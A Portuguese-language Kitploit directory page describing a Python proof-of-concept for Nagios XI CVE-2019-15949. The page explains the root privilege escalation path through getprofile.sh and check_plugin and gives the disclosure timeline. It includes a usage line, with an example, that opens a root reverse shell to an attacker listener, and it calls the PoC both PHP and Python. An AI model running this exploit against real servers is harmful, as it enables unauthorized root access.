Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
Nagios-CVE-2019-15949-RCE — a PoC for the Nagios CVE-2019-15949 rce in python | Kitploit
Ferramentas/GitHubGitHub/plur1bu5/nagios-cve-2019-15949-rce
Privilege EscalationVulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingPayload Development
GitHubplur1bu5/nagios-cve-2019-15949-rce

Nagios-CVE-2019-15949-RCE

a PoC for the Nagios CVE-2019-15949 rce in python

Ver Repositório
há 5 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

Nagios-CVE-2019-15949-RCE-Poc

um PoC em Python para o CVE-2019-15949

Visão Geral

Existe uma vulnerabilidade no Nagios XI <= 5.6.5 que permite a um atacante explorar um RCE para escalar privilégios para root. O exploit requer acesso ao servidor como o usuário 'nagios', ou acesso ao CCM via interface web com permissões para gerenciar plugins.

Detalhes

O script getprofile.sh, invocado ao baixar um perfil do sistema (profile.php?cmd=download), é executado como root por meio de uma entrada sudo sem senha; o script executa o executável 'check_plugin', que pertence ao usuário nagios. Um usuário logado no Nagios XI com permissões para modificar plugins, ou o usuário 'nagios' no servidor, pode modificar o executável 'check_plugin' e inserir comandos maliciosos executáveis como root.

PoC

Um PoC em PHP foi desenvolvido, que envia um payload resultando em um shell reverso como root. Uso:

python3 exploit.py targetIp [ssl=false/true] username password Lhost lport

exemplo:

python3 exploit.py 10.10.11.9 false nagiosadmin admin 10.10.11.14 4444

Divulgação

Reportado ao Nagios em: 29 de julho de 2019 Confirmado pelo Nagios em: 29 de julho de 2019 Corrigido na versão: 5.6.6 em: 20 de agosto de 2019 CVE Atribuído em: 6 de setembro de 2019 (CVE-2019-15949 https://nvd.nist.gov/vuln/detail/CVE-2019-15949)

Baixar ferramenta